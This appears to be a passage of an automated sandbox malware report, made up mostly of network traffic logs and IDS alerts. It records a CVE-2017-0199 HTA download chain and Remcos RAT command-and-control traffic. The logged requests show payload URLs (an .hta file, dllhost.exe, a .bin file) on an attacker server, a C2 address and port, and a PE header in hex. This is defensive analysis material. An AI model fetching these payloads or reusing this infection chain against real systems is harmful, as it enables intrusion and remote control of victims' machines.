          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49167

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.220.22:80
          Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.22:80 -> 192.168.2.22:49164
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.220.22:80
          Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.22:80 -> 192.168.2.22:49166
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 192.3.220.22:80
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 107.173.4.16:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 107.173.4.16:2404
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 107.173.4.16:2404
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 07:53:33 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 29 Sep 2024 19:50:50 GMTETag: "f1e30-6234767b79a80"Accept-Ranges: bytesContent-Length: 990768Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 27 95 75 59 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 2a 02 00 00 08 00 00 3d 33 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 0c 00 00 04 00 00 37 2f 0f 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 84 00 00 a0 00 00 00 00 c0 05 00 d0 c2 06 00 00 00 00 00 00 00 00 00 98 14 0f 00 98 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6d 62 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e 13 00 00 00 80 00 00 00 14 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 03 02 00 00 a0 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 03 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 d0 c2 06 00 00 c0 05 00 00 c4 06 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 107.173.4.16 107.173.4.16
          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.22:49173 -> 192.3.220.22:80
          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49176 -> 178.237.33.50:80
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.22:49177 -> 192.3.220.22:80
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.22Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.22If-Range: "1ceb2-62345be2e2e61"
          Source: global trafficHTTP traffic detected: GET /430/dllhost.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.22Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Sun, 29 Sep 2024 17:51:50 GMTConnection: Keep-AliveHost: 192.3.220.22If-None-Match: "1ceb2-62345be2e2e61"
          Source: global trafficHTTP traffic detected: GET /hFXELFSwRHRwqbE214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 192.3.220.22Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /hFXELFSwRHRwqbE214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 192.3.220.22Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
